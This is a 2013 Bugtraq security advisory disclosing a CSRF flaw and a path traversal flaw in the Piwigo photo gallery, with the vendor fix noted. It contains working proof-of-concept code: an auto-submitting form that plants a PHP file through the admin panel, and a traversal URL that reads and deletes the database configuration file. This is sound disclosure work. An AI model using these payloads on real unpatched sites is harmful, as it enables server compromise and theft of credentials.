[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple Vulnerabilities in Piwigo

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple Vulnerabilities in Piwigo
From: advisory@xxxxxxxxxxxx
Date: Wed, 27 Feb 2013 12:04:12 +0100 (CET)

Advisory ID: HTB23144
Product: Piwigo
Vendor: Piwigo project
Vulnerable Version(s): 2.4.6 and probably prior
Tested Version: 2.4.6
Vendor Notification: February 6, 2013 
Vendor Patch: February 19, 2013 
Public Disclosure: February 27, 2013 
Vulnerability Type: Cross-Site Request Forgery [CWE-352], Path Traversal 
[CWE-22]
CVE References: CVE-2013-1468, CVE-2013-1469
Risk Level: High 
CVSSv2 Base Scores: 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C), 4 
(AV:N/AC:H/Au:N/C:P/I:N/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple 
vulnerabilities in Piwigo, which can be exploited to perform Сross-Site Request 
Forgery and Path Traversal attacks.


1) Сross-Site Request Forgery (CSRF) in Piwigo: CVE-2013-1468

The vulnerability exists due to insufficient verification of the HTTP request 
origin in "/admin.php" script. A remote attacker can trick a logged-in 
administrator to visit a specially crafted webpage and create arbitrary PHP 
file on the remote server.

The following PoC (Proof of Concept) code creates a file "file.php" containing 
"phpinfo();", which can be later accessed via the http://[host]/file.php URL:


<form action="http://[host]/admin.php?page=plugin-LocalFilesEditor"; 
method="post" name="f1">
<input type="hidden" name='edited_file' value='file.php'>
<input type="hidden" name='text' value=' phpinfo(); '>
<input type="hidden" name='submit' value='1'>
<input type="submit" id="btn">
</form>
<script>
document.f1.submit();
</script>


Successful exploitation requires that the "LocalFiles Editor" plugin is enabled 
(disabled by default).


2) Path Traversal in Piwigo: CVE-2013-1469

The vulnerability exists due to insufficient filtration of user-supplied input 
in "dl" HTTP GET parameter passed to "/install.php" script. The script is 
present on the system after installation by default, and can be accessed by 
attacker without any restrictions. The vulnerable code is:


if (!empty($_GET['dl']) && 
file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
{
  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
  ...
  echo file_get_contents($filename);
  ...
}


However, the vulnerability may be exploited only if PHP 'file_exists' function 
returns 'true' both for "C:/boot.ini" (or any existing file) and for 
"C:/any_non_existing_directory/../boot.ini" (in our case the non-existing 
directory in path is "/pwg_/"). This works in default PHP installation on 
Windows platform (tested on Windows 7, PHP 5.3.x). In case of successful 
exploitation remote attacker can read content of arbitrary files on the 
vulnerable system. 
Important: after being read the file is deleted (if web server has write 
permission to it).


The following PoC (Proof of Concept) code will display and delete the 
application's configuration file:

http://piwigo/install.php?dl=/../../local/config/database.inc.php


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to Piwigo 2.4.7

More Information:
http://piwigo.org/releases/2.4.7
http://piwigo.org/bugs/view.php?id=0002843
http://piwigo.org/bugs/view.php?id=0002844

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23144 - 
https://www.htbridge.com/advisory/HTB23144 - Multiple Vulnerabilities in Piwigo.
[2] Piwigo - http://piwigo.org/ - Piwigo is a photo gallery software for the 
web, built by an active community of users and developers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types. 

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

Prev by Date: [KIS-2013-03] Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
Next by Date: Cross-Site Scripting (XSS) in Geeklog
Previous by thread: [KIS-2013-03] Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
Next by thread: Cross-Site Scripting (XSS) in Geeklog
Index(es):
- Date
- Thread